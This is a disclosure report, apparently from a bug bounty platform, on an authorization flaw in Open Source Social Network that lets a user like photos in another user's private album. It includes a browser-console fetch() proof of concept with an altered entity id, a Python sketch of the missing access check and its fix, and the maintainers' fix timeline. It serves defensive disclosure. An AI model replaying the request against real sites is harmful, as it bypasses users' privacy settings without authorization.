Improper Privilege Management in opensource-socialnetwork/opensource-socialnetwork

Valid

Reported on

Jul 22nd 2021


💥 BUG

An unprivileged user can like a photo in a private album.

💥 IMPACT

A user who does not have permission to view a private album can still comment in that album.

💥 STEPS TO REPRODUCE

There are two users, user-A and user-B.
1. First go to user-A's account and create a private album.
Let the album URL be http://localhost/opensource-socialnetwork/album/view/10, with only friends allowed to see this album.

2. Now go to user-B's account and send the request below, which will create a like:

await fetch("http://localhost/opensource-socialnetwork/action/post/like?ossn_ts=1626891487&ossn_token=1621bc0dbc2b6deaca5953fb7b090441d4d2eb2295ced160c9471214a09f2112", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest"
    },
    "referrer": "http://localhost/opensource-socialnetwork/photos/view/56",
    "body": "&entity=56&reaction_type=haha",
    "method": "POST",
    "mode": "cors"
});

In this request, change the entity id to the image id of a photo in the private album, execute the JavaScript code in the browser console, and observe that the like is recorded on the photo in the private album.
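As an added illustration (not code from the report or from OSSN), a small Python model of the authorization gap described above: a like on a photo must be subject to the same visibility rule as viewing its album. The album access levels, the user names and the `Site` class are assumptions made for this example.

```python
# Added example (not OSSN code): the authorization check the like action lacks.
# Names and data are constructed; FRIENDS mirrors the report's friends-only album.
from dataclasses import dataclass, field

PUBLIC, FRIENDS, PRIVATE = "public", "friends", "private"

@dataclass
class Album:
    owner: str
    access: str  # PUBLIC, FRIENDS (owner's friends) or PRIVATE (owner only)

@dataclass
class Photo:
    id: int
    album: Album

@dataclass
class Site:
    friends: dict = field(default_factory=dict)  # owner -> set of friend names
    likes: list = field(default_factory=list)    # (user, photo id, reaction)

    def can_view(self, user: str, photo: Photo) -> bool:
        album = photo.album
        if user == album.owner or album.access == PUBLIC:
            return True
        if album.access == FRIENDS:
            return user in self.friends.get(album.owner, set())
        return False  # PRIVATE: owner only

    def like_vulnerable(self, user: str, photo: Photo, reaction: str) -> bool:
        # Vulnerable: any logged-in user with a valid entity id gets through.
        self.likes.append((user, photo.id, reaction))
        return True

    def like_fixed(self, user: str, photo: Photo, reaction: str) -> bool:
        # Fixed: the write is gated by the same rule that gates viewing.
        if not self.can_view(user, photo):
            return False
        self.likes.append((user, photo.id, reaction))
        return True

def demo() -> tuple:
    """Reproduce the report: user-B is not user-A's friend, user-C is."""
    site = Site(friends={"user-A": {"user-C"}})
    photo = Photo(56, Album("user-A", FRIENDS))
    return (site.like_vulnerable("user-B", photo, "haha"),
            site.like_fixed("user-B", photo, "haha"),
            site.like_fixed("user-C", photo, "haha"))
```

The same `can_view` gate belongs in front of every write that targets an entity (comments, reactions, shares), not only the view route.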

We have contacted a member of the opensource-socialnetwork team and are waiting to hear back 2 years ago
opensource-socialnetwork/opensource-socialnetwork maintainer validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
opensource-socialnetwork/opensource-socialnetwork maintainer marked this as fixed with commit 17e951 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE